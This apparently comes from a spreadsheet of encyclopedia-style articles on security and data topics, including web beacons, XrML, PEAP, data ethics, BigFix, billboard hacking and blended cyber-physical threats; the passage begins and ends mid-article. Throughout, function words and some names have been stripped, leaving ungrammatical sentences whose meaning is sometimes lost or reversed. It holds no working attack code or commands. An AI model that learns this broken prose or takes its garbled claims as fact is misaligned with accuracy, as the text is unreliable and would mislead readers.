emails email server one's computer.) case, messages containing beacons able trigger requests beacons' host servers, tracking prevented. would delete messages suspected containing beacons risk beacons activate computer reconnected internet. beacons also filtered server level never reach end-user. beacon beacon (application programming interface) candidate recommendation world wide consortium, standards organization web. standardized allows send data back server without harming user experience.use beacon allows tracking without interfering delaying navigation away site, invisible end-user. support beacon introduced mozilla's firefox browser february 2014 google's chrome browser november 2014. notes references external links "did read it?" linux weekly news trojan marketing slashdot bugs—slashdot.org forum thread blocking bugs</t>
  </si>
  <si>
    <t>XrML</t>
  </si>
  <si>
    <t>xrml extensible rights markup language also standardized rights expression language (rel) mpeg-21. xrml owned contentguard. xrml based describes rights, fees conditions together message integrity entity authentication information. history development xerox parc dprl mark stefik, researcher xerox parc, known originator concepts became xrml language. stefik engaged research topic trusted systems secure digital commerce, part language express rights system would allow users perform digital resources. first version rights expression language became xrml developed xerox parc, called digital property rights language (dprl). dprl appears patent filed xerox november 1994 (and granted february 1998) entitled: "system controlling distribution digital work having attached usage rights where usage rights defined usage rights grammar" patent 5,715,403, issued xerox corporation). between 1994 1998, xerox formed rights management group continue work represented patent. november 1998, xerox issued first version digital property rights language (dprl), labelled version 2.0. prior time, dprl written lisp programming language. dprl documentation makes clear dprl designed machine-to-machine interaction, rights expressed machine actionable functions. also states clearly interpreting dprl-based expression rights, rights explicitly granted acted upon. areas rights expression silent must interpreted rights granted, therefore must denied software enforcing rights. xrml 1999, version dprl licensed company founded microsoft xerox called contentguard, developed dprl extensible rights markup language (xrml). version xrml published 2001. xrml evolution dprl. expanded much management structure dprl, adding unique identifiers, private public keys, mechanisms identifying verifying authenticity issuer user resource. also added certification hardware software would part trusted environment. rights list remained same, although definitions individual rights changed somewhat. particular, xrml distinguished clearly rights created resource versus modified existing resource. xrml version xrml radical departure preceded where dprl xrml contained specific language machine-actionable rights ("copy" "transfer" "backup" "install" etc.) version abstract rights language core elements. core elements xrml ones needed establish trust systems transactions take place. these include issuer license, parties license, ability include resources rights, digital signatures, etc. this version specific medium type resource, generalized control rights digital resources, services, digital entity. xrml standards march 2002, hari reddy contentguard became chair oasis technical committee rights languages. meeting contentguard appears presented version xrml, 2.1, starting point committee's work. group disbanded later year, unable agree direction work. contentguard also working electronic book exchange (ebx) 2000, later open ebook forum (oebf), development standards digital rights management ebooks. 2003, oebf "rights rules" working group developed draft standard rights expression language based xrml 2.0, however standards effort halted revived writing. time, contentguard participating mpeg-21 standards committee, xrml proposed basis part mpeg-21 standard (iso/iec 21000), rights expression language. through member vote international organization standardization, mpeg-21 standard, including part became official international standard. contentguard ceased work xrml point became adopted official standard; iso/iec 21000-5 current manifestation. external links xrml.org digital property rights language, manual tutorial. edition. version 2.0., 1998. xerox corporation. xrml version mpeg-21 working site mpeg-21 rights expression language. white paper rightscom.</t>
  </si>
  <si>
    <t>Protected Extensible Authentication Protocol</t>
  </si>
  <si>
    <t>peap also acronym personal egress packs.the protected extensible authentication protocol, also known protected simply peap, protocol encapsulates extensible authentication protocol (eap) within encrypted authenticated transport layer security (tls) tunnel. purpose correct deficiencies eap; assumed protected communication channel, provided physical security, facilities protection conversation provided.peap jointly developed cisco systems, microsoft, security. peapv0 version included microsoft windows nominally defined draft-kamath-pppext-peapv0-00. peapv1 peapv2 defined different versions draft-josefsson-pppext-eap-tls-eap. peapv1 defined draft-josefsson-pppext-eap-tls-eap-00 draft-josefsson-pppext-eap-tls-eap-05, peapv2 defined versions beginning draft-josefsson-pppext-eap-tls-eap-06.the protocol specifies chaining multiple mechanisms specific method. however, eap-mschapv2 eap-gtc methods commonly supported. overview peap similar design eap-ttls, requiring server-side certificate create secure tunnel protect user authentication, uses server-side public certificates authenticate server. creates encrypted tunnel client authentication server. configurations, keys encryption transported using server's public key. ensuing exchange authentication information inside tunnel authenticate client encrypted user credentials safe eavesdropping. 2005, peap sub-types certified updated wpa2 standard. they are: peapv0/eap-mschapv2 peapv1/eap-gtcpeapv0 peapv1 refer outer authentication method mechanisms create secure tunnel protect subsequent authentication transactions. eap-mschapv2 eap-gtc refer inner authentication methods provide user device authentication. third authentication method commonly used peap eap-sim. within cisco products, peapv0 supports inner methods eap-mschapv2 eap-sim peapv1 supports inner methods eap-gtc eap-sim. since microsoft supports peapv0 doesn’t support peapv1, microsoft simply calls "peap" without designator. another difference microsoft cisco microsoft supports eap-mschapv2 method eap-sim method. however, microsoft supports another form peapv0 (which microsoft calls peap-eap-tls) many cisco third-party server client software don’t support. peap-eap-tls requires client installation client-side digital certificate secure smartcard. peap-eap-tls similar operation original eap-tls provides slightly protection portions client certificate unencrypted eap-tls encrypted peap-eap-tls. ultimately, peapv0/eap-mschapv2 prevalent implementation peap, integration peapv0 microsoft windows products. cisco's cssc client (discontinued 2008 supports peap-eap-tls. peap successful market place even funk software (acquired juniper networks 2005), inventor backer eap-ttls, added support peap server client software wireless networks. peapv0 eap-mschapv2 ms-chapv2 authentication protocol microsoft introduced nt4.0 windows peapv0/eap-mschapv2 common form peap use, usually referred peap. inner authentication protocol microsoft's challenge handshake authentication protocol, meaning allows authentication databases support ms-chapv2 format, including microsoft microsoft active directory. behind eap-tls, peapv0/eap-mschapv2 second widely supported standard world. there client server implementations various vendors, including support recent releases microsoft, apple computer cisco. other implementations exist, xsupplicant open1x.org project, wpa_supplicant. 802.1x types, dynamic encryption used peap. certificate must used client authenticate server client client submits authentication credentials. certificate validated, general trivial introduce fake wireless access point allows gathering ms-chapv2 handshakes.several weaknesses found ms-chapv2, severely reduce complexity brute-force attacks making feasible modern hardware. peapv1 eap-gtc peapv1/eap-gtc created cisco provide interoperability existing token card directory based authentication systems protected channel. even though microsoft co-invented peap standard, microsoft never added support peapv1 general, means peapv1/eap-gtc native windows support. since cisco typically recommended lightweight protocols leap eap-fast protocols instead peap, latter widely adopted hoped. with interest microsoft support peapv1 promotion cisco, peapv1 authentication rarely used. even windows released late 2009, microsoft added support authentication system mschapv2. nokia later mobile phones ship version symbian includes eap-gtc support. ldap (lightweight directory access protocol) supports eap-gtc. references external links kamath, vivek; palekar, ashwin; wodrich, mark october 2002). microsoft's peap version (implementation windows sp1). ietf. draft-kamath-pppext-peapv0-00. draft-josefsson-pppext-eap-tls-eap eap-tls protocol specifications</t>
  </si>
  <si>
    <t>Big data ethics</t>
  </si>
  <si>
    <t>data ethics also known simply data ethics refers systemizing, defending, recommending concepts right wrong conduct relation data, particular personal data. since dawn internet sheer quantity quality data dramatically increased continuing exponentially. data describes large amount data voluminous complex traditional data processing application software inadequate deal them. recent innovations medical research healthcare, high-throughput genome sequencing, high-resolution imaging, electronic medical patient records plethora internet-connected health devices triggered data deluge reach exabyte range near future. data ethics increasing relevance quantity data increases scale impact. data ethics different information ethics focus information ethics concerned issues intellectual property concerns relating librarians, archivists, information professionals, data ethics concerned collectors disseminators structured unstructured data data brokers, governments, large corporations. principles data ethics concerned following principles: ownership individuals data. transaction transparency individuals personal data used, transparent access algorithm design used generate aggregate data sets consent individual legal entity would like personal data, needs informed explicitly expressed consent personal data moves whom, when, purpose owner data. privacy data transactions occur reasonable effort needs made preserve privacy. currency individuals aware financial transactions resulting personal data scale transactions. openness aggregate data sets freely available ownership owns data? ownership involves determining rights duties property. concept data ownership linked one's ability exercise control limit sharing data. person records observations another person owns observations? observer observed? what responsibilities observer observed relation other? since massive scale systematisation observation people thoughts result internet, questions increasingly important address. slavery, ownership person, outlawed recognised countries. question personal data ownership falls unknown territory corporate ownership, intellectual property, slavery. owns digital identity? european laws, general data protection regulation, indicate individuals personal data. personal data refers data sets describing person ranging physical attributes preferences behaviour. examples personal data include: genome data, location, written communication, spoken communication, lists contacts, internet browsing habits, financial transactions, supermarket spending, payments, criminal record, laptop mobile phone camera lens recording, device microphone recordings, driving habits trackers, mobile health records, fitness activity, nutrition, substance use, heartbeat, sleep patterns vital signs. collective individual's personal data forms digital identity perhaps digital alter fitting). digital identity encompasses personal data shadowing, representing connected physical ideological self. distinction data categories always clear cut. example, health data banking data intertwined behaviour lifestyle inferred banking data hugely valuable predicting risk chronic disease. therefore, banking data also health data. health data indicate much individual spends healthcare, therefore health data also banking data. these overlaps exist data categories too, example, location data, internet browsing data, data essentially individuals. protection moral rights individual based view personal data direct expression individual's personality: moral rights therefore personal individual, cannot transferred another person except testament individual dies. moral rights include right identified source data right object distortion mutilation data would prejudicial honour reputation. these moral rights personal data perpetual. component personal data ownership unique controlled access i.e. exclusivity. ownership implies exclusivity, particularly abstract concepts like ideas data points. enough simply copy one's data. others restricted access theirs. knowing data others keep near-impossible task. simpler approach would cloak oneself nonsense information. ensure corporations institutions copy, possible send noise confuse data have. example, robot could randomly search terms usually used making data obtained search engine useless confusion (see: track york university). ownership puts emphasis ability conveniently move data service another i.e. portability. when personal data owned individual option simply remove take another site become dissatisfied service. individuals offered high degree convenient portability allowing switch alternatives without losing historic data collections describing product preferences personal conversations. example, choose switch alternative messaging app, possible without losing record previous conversations contacts. giving individuals option switch services without inconveniences losing historical data means services need keep customers happy providing good services rather locking means incompatibility alternatives. portability, data expression must standardised happen seamlessly. example, describing unit "kilograms" rather "kg" means robots recognise different, although same. these small variations result messy data cannot easily combined transferred system cannot recognise them. currently, apple states provide privacy services, however, difficult extract data apple systems making difficult migrate alternative. personal data trading framework, data expression would standardised easy portability click button. standardisation would also facilitate setting mechanisms clean data necessary install checks balances validating quality data. joining multiple sources, would able identify erroneous falsely entered data. owns data today? today data controlled, therefore owned owner sensors. individual making recording entity owning sensor controls happens data default. example, banks control banking data, researchers control research data, hospitals control health record data. historical reasons, current scenario research institutions hold data fragment data describing part individual. health research data europe exist fragmented manner controlled different institutions. data categories often describe controls data stored rather data describing application could applied while internet owned anyone, corporations come control much personal data, creating value making data collection, search engines communication tools. default, side effect owning intellectual property making internet tools, corporations collecting digital identities material services delivered companies profit. most data collected internet services personal data describing individuals. traditionally, medicine organises data around individual enables understanding health. when studying epidemiology, data groups still organised around individual. many processes made efficient concern individuals group dynamics. however, data necessarily organised around individual, rather, data controlled owner sensors. china, government largely owns data. chinese province data used generate social index score person based online offline individual behaviour, jaywalking amount toilet paper used public lavatory. social index determines access particular public services. transaction transparency concerns raised around biases integrated algorithm design resulting systematic oppression. algorithm design transparently disclosed. reasonable efforts made take account differences individuals groups, without losing sight equality. algorithm design needs inclusive. terms governance, data ethics concerned types inferences predictions made using data technologies algorithms.anticipatory governance practice using predictive analytics assess possible future behaviours. this ethical implications affords ability target particular groups places encourage prejudice discrimination example, predictive policing highlights certain groups neighbourhoods watched closely others leads sanctions areas, closer surveillance profiles sanctioned.the term "control creep" refers data generated particular purpose mind repurposed. this practice seen airline industry data repurposed profiling managing security risks airports.in regard personal data, individual right know: data collected? going used? long stored? amended individual concerned?examples ethical uses data transaction include: statutory purposes: collection personal data state completely transparent covered formal license negotiated prior data collection. this civil contract individual responsible authorities sets conditions individual licenses his/her data responsible authorities, accordance transparency principles social purposes: uses individual data social purposes opt-in, opt-out. they comply transparency principles. crime: crime prevention explicit general principles harvesting personal data established widely publicised. governing body state consider approve principles. commerce: personal data used commercial purposes belongs individual used without license individual setting permitted uses. this includes data collected websites, page visits, transfers site site, internet activity. individuals right decide personal data used commercial purposes, case-by-case category basis. research: personal data used research purposes belongs individual must licensed user terms personal consent form fulfils transparency principles outlined above. extra-legal purposes: personal data used extra-legal purposes explicit prior consent rights holder. consent individual legal entity would like personal data, needs informed explicitly expressed consent personal data moves whom, when, purpose subject data. subject information right know data used. data transaction cannot used bargaining chip unrelated superfluous issue consent, example, improve marketing recommendations trying ring contact relative. while services data sharing needed, transactions exaggerated held within context. example, individual needs share data receive adequate medical recommendations, however, medical data automatically need health insurance provider. ultimately come upon individual make decision data. these separate data transactions dealt such. implied consent accepting transfer data ownership chat application used considered valid. full scope extent transaction needs explicitly detailed individual given reasonable opportunity engage process evaluating whether would like engage. timing critical. i.e.. issues dealt calm moment time reflect, moment urgent purchase made medical emergency occurring. permission needs given format explicit, implied. just application chosen chat mean access list contacts needed. button clicked give permission designed automatic behaviour opting example, binary choices button smaller other, button hidden design jumps out, button requires multiple clicks whereas single click. while person could give consent general topic continuous, always possible retract permission future transactions. similarly, consent sexual activity, retraction past consent data transactions feasible. example, would possible individual give consent personal data cause advancing treatment cardiovascular disease notice. until human changes mind, transactions continue occur seamlessly without involvement human. dynamic consent context health genomic research might provide appropriate consent approach once-off broad informed consent, terms issues outlined above. privacy data transactions occur reasonable effort needs made preserve privacy. shall subjected arbitrary interference privacy, family, home correspondence, attacks upon honour reputation. everyone right protection interference attacks." united nations declaration human rights article privacy matter? data useful make systems efficient; however, defining goal efficiency essential assessing ethical data usage data monitoring government observe citizens needs explicit authorization appropriate judicial process. possibly would even efficient observe relatively small number criminals manually rather track relatively large population. blanket observation inhabitants national governments corporations slippery slope orwellian style governance. privacy keeping secrets, choice, human rights, freedom, liberty. example, sharing medical data doctor understanding used improve health ethically sound, even doctor reveals data another doctor. however, data shared marketing agency happened british national health system google's deepmind artificial intelligence company ethical implications uncertain (google deepmind healthcare algorithms julia powles hodson). privacy choosing context; data shared, who, purpose, when. privacy currently implemented possibly personal power wealth gain acting disincentive private companies governments. also, using data measure actual social impact could reveal inefficiency would inconvenient politicians involved companies’ claims. public debate privacy often unfairly obscured over-simplistic binary choice privacy scientific progress. marketing campaigns even dismissed critics centralized data collection resisting progress holding past. however, benefits scientific progress data achieved manner consistent privacy values historically case epidemiological research. extraction value data without compromising identity privacy certainly possible technologically; e.g., utilizing homomorphic encryption algorithmic design makes reverse engineering difficult. homomorphic encryption allows chaining together different services without exposing data services. even software engineers working software would able override user. homomorphic encryption schemes malleable design meaning used cloud computing environment ensuring confidentiality processed data. technique allows analytical computations carried cipher text, therefore generating encrypted results which, decrypted, match results operations performed plain-text. results analytics presented purpose without compromising identity privacy. example, data sale stating "20% amsterdam eats muesli breakfast" would transmit analytical value data without compromising privacy, whereas saying "ana eats muesli breakfast" would maintain privacy. algorithmic design size sample group critical minimize capacity reverse engineer statistics track targeted individuals. technical solution reverse engineering aggregate metrics introduce fake data points made people alter result, example percentage group eats muesli. privacy presented limitation data usage could also considered unethical. example, sharing healthcare data shed light causes diseases, effects treatments, allow tailored analyses based individuals' needs. this ethical significance data ethics field many value privacy, affordances data sharing also quite valuable, although contradict one's conception privacy. attitudes data sharing based perceived loss control data fear exploitation personal data. however, possible extract value data without compromising privacy. some scholars jonathan king neil richards redefining traditional meaning privacy, others question whether privacy still exists. 2014 article wake forest review, king richard argue privacy digital understood terms secrecy term regulations govern control personal information. european union, right forgotten entitles countries force removal de-linking personal data databases individual's request information deemed irrelevant date. according andrew hoskins, demonstrates moral panic members perceived loss privacy ability govern personal data digital age. united states, citizens right delete voluntarily submitted data. this different right forgotten much data produced using data technologies platforms voluntarily submitted. currency business models driving tech giants uncovered possibility making human identity product consumed. while tech services including search engines, communication channels maps provided free, currency uncovered process personal data. there variety opinion whether ethical receive money exchange access personal data. parallels drawn blood donations, rate infectious blood donated decreases financial transaction blood donor. additional questions arise around receive profit data transaction? much data worth? what exchange rate personal data money? data valuable allows users efficiently guessing operating using trial error. there elements data value: trends real-time. build-up historical data allows make future predictions based trends. real-time data gives value actions made instantaneously. much tech services search engine, communications channel digital actually worth, example dollars? difference value services facilitated tech companies equity value tech companies difference exchange rate offered citizen 'market rate' value data. scientifically many holes picked rudimentary calculation: financial figures tax-evading companies unreliable, would revenue profit appropriate, user defined, large number individuals needed data valuable, would tiered price different people different countries, google revenue gmail, etc. although calculations undeniably crude, exercise serves make monetary value data tangible. another approach find data trading rates black market. publishes yearly cybersecurity shopping list takes approach. examples given cover specific cases, extend profits data sales areas healthcare monthly profit individual would increase. this raises economic question whether free tech services exchange personal data worthwhile implicit exchange consumer. personal data trading model, rather companies selling data, owner sell personal data keep profit. personal data trading framework gives individuals ability digital identity create granular data sharing agreements internet. rather current model tolerates companies selling personal data profit, personal data trading, individuals would sell personal data known parties choice keep profit. core effort re-decentralise internet. rather current model tolerates companies selling personal data profit, personal data trading, individual human beings would directly consciously sell personal data known parties choice keep profit. personal data trading adds fourth mechanism wealth distribution, three salaries jobs, property ownership, company ownership. ultimate goals personal data trading model are: more equitable global resource distribution balanced allocation global resources. personal data trading individuals proposed framework would result distributed profits amongst population also radical consequences societal power structures. widely acknowledged current centralised data design exacerbates ideological echo chambers far-reaching implications seemingly unrelated decision-making processes elections. data exchange rate monetary, ideological. institutional processes compromised centralised communication tools guided freely harvested personal data? while initially realistic assume data would traded money, possible imagine future data would traded data. "i’ll show show mine" scenario could replace money altogether. importantly, future scenario first step focus exchanging personal data existing monetary currency. openness idea open data centred around argument data freely available restrictions would prohibit use, copyright laws. 2014 many governments begun move towards publishing open datasets purpose transparency accountability. this movement gained traction "open data activists" called governments make datasets available allow citizens extract meaning data perform checks balances themselves. king richards argued call transparency includes tension openness secrecy.activists scholars also argued open-sourced model data evaluation based voluntary participation, availability open datasets democratizing effect society, allowing citizen participate. some, availability certain types data seen right essential part citizen's agency.the open knowledge foundation (okf) lists several dataset types provided governments order truly open. tool called global open data index (godi) crowd-sourced survey measuring openness governments, according open definition. godi provide tool providing important feedback governments quality open datasets.willingness share data varies person person. preliminary studies conducted determinants willingness share data. example, suggested baby boomers less willing share data millennials. role institutions nation states data sovereignty refers government's control data generated collected within country. issue data sovereignty heightened edward snowden leaked government information number governments individuals government spying this prompted many governments reconsider approach data sovereignty security citizens' data.j. jong-chen points restriction data flow hinder scientific discovery, disadvantage many particularly, developing countries. this considerable concern data ethics tension important issues cybersecurity global development. banks banks hold position society keeper value. their data policy compromise trust relationship clients keeper value. example, bank shares data butcher another butcher, could compromise trust relationship revelation data competitors. relevant news items data ethics edward snowden revelations june 2013 marked turning point data ethics public debate. ongoing publication leaked documents revealed previously unknown details global surveillance apparatus united states close cooperation three five eyes partners: australia's asd, uk's gchq, canada's csec. netherlands, bank made public statement intentions around data usage. facebook-cambridge analytica data scandal involves collection personal data possibly million facebook users attempt influence voter opinion. both 2016 brexit vote 2015/6 campaigns politicians donald trump cruz paid cambridge analytica information data breach influence voter opinion. relevant legislation data ethics october 2001 patriot came force response broad concern felt among americans september attacks. broadly speaking patriot laid path allowing security forces surveil citizens suspected involvement terrorist acts. 2018 general data protection regulation 2016/679 (gdpr) came effect across european union. gdpr addresses issues transparency data controllers towards individuals, referred data subjects, need permission data subjects handle personal data. also dynamic consent open knowledge foundation footnotes references</t>
  </si>
  <si>
    <t>BigFix Inc</t>
  </si>
  <si>
    <t>bigfix (formerly known bigfix, endpoint manager, tivoli endpoint manager (tem), well company name bigfix inc) endpoint management platform enabling operations security teams automate discovery, management, remediation on-premise, virtual, cloud endpoints. bigfix automates management, patching inventory nearly operating system versions. bigfix’s unified architecture patches manages ensure compliance across servers, desktops, mobile devices office, home, cloud. bigfix integrated several third-party applications including vulnerability management solutions like tenable qualys, servicenow, forescout, others. endpoint management capabilities extend aws, azure, google clouds. bigfix creates managed several hundred thousand out-of-the-box automation scripts, called fixlets perform security checks, enhance security posture, many functions. product formerly owned sold ibm, sold technologies july 2019. july 2019, technologies completed acquisition bigfix ibm, previously acquired bigfix undisclosed amount. changed name bigfix product tivoli endpoint manager (tem), shortened name endpoint manager (iem) 2013. changed name back bigfix july 2015. history bigfix, inc., founded david hindawi david donoho april, 1997 emeryville, california. company’s initial product user self-service system management application marketed manufacturers. 2002, company developed bigfix software company-wide networked desktop, mobile server computer management. this shifted focus company consumer enterprise markets. initial uses centered security patch management, identified significant pain point time enterprise departments. 2007, bigfix expanded specific management areas: security threat suppression (bigfix endpoint protection), enterprise security configuration management (bigfix security configuration vulnerability management) enterprise systems management (bigfix systems lifecycle management).in 2009, bigfix entered exclusive partnership trend micro.markets included: banking, financial services, manufacturing, government, education, healthcare. customers included: pitney bowes, stanford university, suntrust bank, miami-dade county public schools, department energy.on july 2010, acquired bigfix, inc. approximately $400 million, integrated bigfix product tivoli software portfolio name tivoli endpoint manager(tem). march 2013, tivoli endpoint manager renamed became endpoint manager (iem).on july 2015, changed name endpoint manager back bigfix.on december 2018, technologies announced acquisition bigfix acquisition closed july 2019. early marketing deloitte’s silicon valley technology fast 2007 2008 2008 award behalf miami-dade county public schools infoworld 2008 behalf miami-dade county public schools computerworld green best practices 2008 award behalf miami-dade county public schools; category logo design love 2008 reporting logo similarities stadt bruhl, beats relevance language relevance language query language created bigfix. purpose relevance language automate operations functions like discovery, properties client (such cpu, disk space, etc.) could retrieved. relevance language abstracts away platform-specific query mechanisms like wmi, /proc, sim. this allows operator learn query language works across supported platforms. addition cross platform compatibility, relevance efficient query language, often responding hundreds times faster native alternatives, wmi.[6] action script action script language scripting language created bigfix. prior purchased ibm, used bigfix platform. action script language provides interface changes made client. action script language abstracts away platform-specific scripting differences like directory traversal, script execution flow control extent. this allows operator learn scripting language works across supported platforms. also relevance language systems management system administration configuration management information security management software license agreement power management list systems management systems references</t>
  </si>
  <si>
    <t>BigID</t>
  </si>
  <si>
    <t>bigid, inc. york based data management company based. company sells software managing sensitive private data.bigid founded dimitri sirota nimrod 2016, currently valued $1.25 billion. history bigid established 2016 seed round funding $2.1 million.a forbes article listed company cloud computing. year, company reached valuation billion dollars.in 2021, 5000 listed bigid 19th fastest growing private company america. references</t>
  </si>
  <si>
    <t>Xceedium</t>
  </si>
  <si>
    <t>xceedium, inc., network security software company providing privileged identity access management solutions subsequently acquired technologies. their software used control manage risks privileged users, privileged accounts (admin, root, etc.) privileged credentials (passwords, certificates, digital keys, etc.) pose systems data. history xceedium inc., founded 2000 david david cheung company split lucid technologies group, company created 1995. company developed software internal provided consultants secure remote access sensitive customer systems. this software became core technology xceedium gatekeeper product. xceedium's products aimed mid-large sized enterprises vertical market segments including banking financial services, retail, telecom, healthcare, energy government agencies. they marketed product global partner network. xceedium's headquarters originally located jersey city, jersey relocated northern virginia march 2011. initial funding venture-backed company came arrowpath venture partners nationwide mutual capital. xceedium private, venture capital backed company funding arrowpath venture partners nationwide mutual capital. june 2012, xceedium closed million financing arrowpath venture partners bringing total capital raised million xceedium acquired technologies august 2015. products xceedium gatekeeper first product designed company, initially built out-of-band in-band remote control. gatekeeper software updated provide network-based access control session recording/playback. later, gatekeeper cloakware password authority product acquired irdeto) integrated form xceedium xsuite. main capabilities xceedium xsuite were: role-based access control, command filtering (white/black list), user containment (prevents based leapfrogging hopping unauthorized nodes), session monitoring/policy violation alerting, session recording playback privileged password vaulting management. xceedium xsuite platform enabled organizations apply principle least privilege, holds systems individuals granted access resources commands absolutely necessary required task. according company, xsuite limited access privileged users systems commands explicitly authorized (role-based access control). also monitored activities privileged users sent alerts individuals attempted violate policy. system recorded privileged user sessions telnet, rdp, ssh, provided mechanism replay recorded session investigations forensics. xsuite cloud amazon services (aws) introduced extension xsuite platform. provided privileged identity access management standalone implementations hybrid architectures include infrastructure nodes (e.g., servers, network devices, storage devices, security systems) running amazon elastic compute cloud (ec2), private clouds, virtual machines traditional single os/hardware scenariosfollowing acquisition xceedium xceedium xsuite integrated product range privileged access manager. references</t>
  </si>
  <si>
    <t>Bilateral key exchange</t>
  </si>
  <si>
    <t>bilateral exchange (bke) encryption scheme utilized society worldwide interbank financial telecommunication (swift).the scheme retired january 2009 replaced relationship management application (rma). management based swift implemented swift phase two. bilateral allowed secure communication across swift network. text swift message authentication used generate message authentication code mac. ensured origin message authenticity message contents. this normally accomplished exchange various swift messages used specifically establishing communicating pair. keys generated either manually inside swift software, automatically secure card reader (scr). since 1994, keys used card reader authentication keys 1,024 rsa. references</t>
  </si>
  <si>
    <t>Blind (app)</t>
  </si>
  <si>
    <t>blind provides anonymous forum community verified employees discuss issues. users blind grouped topics, company broader industry. verifies registered users actually work company work email claims keep user identities untraceable.the news multiple cases, noticeably anonymous surveys reveal frank opinions employees across industries. however, also used discussions everyday topics salaries.according pages store google play, registered employees 83,000 companies. according forbes, used worldwide influencing corporate decisions giving executives information employees' concerns.employees various companies provided input situations workplace app's surveys chats, including korean rage sacking incidence, uber sexual harassment claims, google memo, amazon employment conditions problems. references external links official website</t>
  </si>
  <si>
    <t>Billboard hacking</t>
  </si>
  <si>
    <t>billboard hacking billboard hijacking illegal practice altering billboard without consent owner. involve physically pasting media existing image, hacking system used control electronic billboard displays. replace programmed video different video image. replaced media displayed various reasons, including culture jamming, shock value, promotion, activism, political propaganda, simply amuse viewers. history billboard hacking started commercial messages appeared public space. first centuries inscriptions promoting gladiatorial battles houses wealthiest pompeii commonly encountered passers-by would inscribe humorous insulting responses. commercialisation paint markers spray paint 1960s helped popularise practice. during 1968 protests paris, protesters wrote billboards give voice messages.a decade later, first collectives billboard hackers emerged. francisco, billboard liberation front altered meaning diverse range billboards selectively adding removing words. sydney, billboard utilising graffitists against unhealthy promotions, collective activists medical professionals, used spray paint alter words images billboards promoting cigarettes alcohol. 1984, collective frères ripoulain collaborated american artist keith haring paint billboards platform metro dupleix paris. action followed illicit exhibition platform. self-promotion russian daredevil group called ontheroofs hacked billboard atop skyscraper hong kong, causing display name organization, video previous climb unfinished shanghai tower, words "what's hong kong".two college students belgrade, serbia hacked billboard contacted owner describing vulnerability. hack allowed play space invaders display "hacked4fun". students thanked owner pointing vulnerability given ipad mini.in republic square, belgrade, serbia, hackers caused billboard display advertisement pirate read "first ignore you, laugh you, fight you, win." activism group named "brandalism" hacking european billboards since 2012. around november 2015, prior paris climate talks (cop21), street artists joined group gained control around billboards around paris making display message "we'll keep bribing politicians emitting greenhouse gases" volkswagen promotion reading "we're sorry caught."in london, students recreated film posters black leads installed shelter advertising spaces. these posters sought highlight lack black representation popular culture. legal response depending circumstances, billboard hacking illegal. opened investigation following display obscene goatse image billboard buckhead, atlanta. another instance, sentenced months prison displaying pornography moscow billboard. non-electronic billboard hacks rarely arrests. study warned corporate clients attempts prosecute billboard hackers would likely cause publicity original offence, suggested best response "address criticisms raised." methods control display electronic billboards achieved hacking. possible knowing default password provided manufacturer customer neglect choose one. manufacturers increasingly prevent billboard hacking installing cctv cameras embedding anti-hacking features software hardware billboard.with non-electronic billboards, image simply pasted image, original image modified using technique détournement. also billboard liberation front billboard utilising graffitists against unhealthy promotions references</t>
  </si>
  <si>
    <t>QuintessenceLabs</t>
  </si>
  <si>
    <t>quintessencelabs ltd. quintessencelabs) cybersecurity company headquartered canberra, australia offices jose, california. quintessencelabs produces encryption policy management products conform management interoperability protocol (kmip), well hardware random number generator, development quantum distribution (qkd) system, encryption solutions include automatic zeroization.the company founded 2008 vikram sharma, following research quantum technology conducted australian national university sharma, thomas symul, andrew lance ping lam. westpac group, major investor, extended rounds funding quintessencelabs 2015 2017, respectively.in july 2017, quintessencelabs received grant au$3.26m australian department defence's innovation develop free-space quantum distribution system. references external links company website quantum unbreakable cryptography first look: quintessencelabs trusted security foundation (tsf) prime minister malcolm turnbull’s address sinet61 random number generator powered quantum 'crackle universe’ kmip implementations known kmip future cybersecurity high-speed quantum encryption warns instant breaking encryption quantum computers time invest skills quantum computing revolution</t>
  </si>
  <si>
    <t>Blended threat</t>
  </si>
  <si>
    <t>blended threat (also known blended attack) software exploit involves combination attacks different vulnerabilities. blended threats software exploits techniques attack propagate threats, example worms, trojan horses, computer viruses. description complex threats consist attacks, multiple attacks kind. examples complex threats include series coordinated physical hostilities, paris terrorist attacks 2015 combination threats cyberattack distinct physical attack, coordinated.in recent years, cyber attacks demonstrated increased ability impact physical systems, stuxnet, triton trisis malware, caused ransomware attacks wannacry netwalker recognizing computer system threats occur potential physical hazards, term "blended threat" also defined natural, accidental, purposeful physical virtual danger potential crossover impacts harm life, information, operations, environment, property. this adaptation based terminology 2010 department homeland security's risk lexicon.illustrating rapidly dangerously play out, sarah coble (writing infosecurity june 2020 reported, "the life jessica hatch, houston business owner, “threatened cyber-criminals hacked company’s social media account posted racist messages". founder infinity diagnostics center said company’s instagram account compromised… unknown malicious hacker. after gaining access account, threat actor uploaded multiple stories designed paint hatch business racist.” post "blended threats: protests! hacking? death threats!?!", gate highlighted risk management processes need account complex blended threat environment. september 2020, argentina's official immigration agency, dirección nacional migraciones, suffered netwalker ransomware attack temporarily halted border crossing country. blended threats, form cyber attack, evolved cause loss life. september 2020, german authorities hacker attack caused failure systems university hospital düsseldorf (ukd) duesseldorf, woman needed urgent admission died taken another city treatment.according guardian, worst-case scenario, crackers could potentially carry "cyber-physical attacks turning satellite antennas weapons operate like microwave ovens."on september 2019, cyber threat alliance (cta) released joint analysis product titled "the illicit cryptocurrency threat" said illicit cryptocurrency mining overtaken ransomware biggest cyber threat businesses. said mining attacks become common attacks client's encounter.blended threats also compromise healthcare systems, many need internet connection operate, numerous medical devices pacemakers, making latter part internet things (iot) growing network connected devices, potentially vulnerable cyber attack. 2020, threats already reported medical devices. recently, crucial flaw 500,000 pacemakers could expose users attack discovered. additionally, security researchers revealed chain vulnerabilities brand pacemaker attacker could exploit control implanted pacemakers remotely cause physical harm patients.on july 2019, mother delivered baby springhill medical center mobile alabama. mother, kidd, wasn’t informed springhill struggling cyberattack went deliver daughter, doctors nurses missed number tests would shown umbilical cord wrapped around baby's neck, leading brain damage death nine months later.on february 2021 unidentified cyber actors accessed supervisory control data acquisition (scada) system drinking water treatment plant oldsmar, florida. once system accessed, intruders manipulated level sodium hydroxide, also known caustic soda, setting parts mission 11,100 parts million. high levels, sodium hydroxide severely damage human tissue. main ingredient liquid drain cleaners, levels used control water acidity remove metals drinking water.on 2021, colonial pipeline, american pipeline system originates houston, texas, carries gasoline fuel mainly southeastern united states, suffered ransomware cyberattack impacted computerized equipment managing pipeline. ransomware attack crippled delivery million barrels fuel texas york. attack caused fuel shortages east coast united states. 2021, meat supplier suffered ransomware attack. jbs-owned beef facilities united states rendered temporarily inoperative.the attack caused spillover effect farming restaurant industries. september 2021, iowa-based provider agriculture services cooperative inc. ransomware attack forcing take systems offline. blackmatter group behind attack forth $5.9 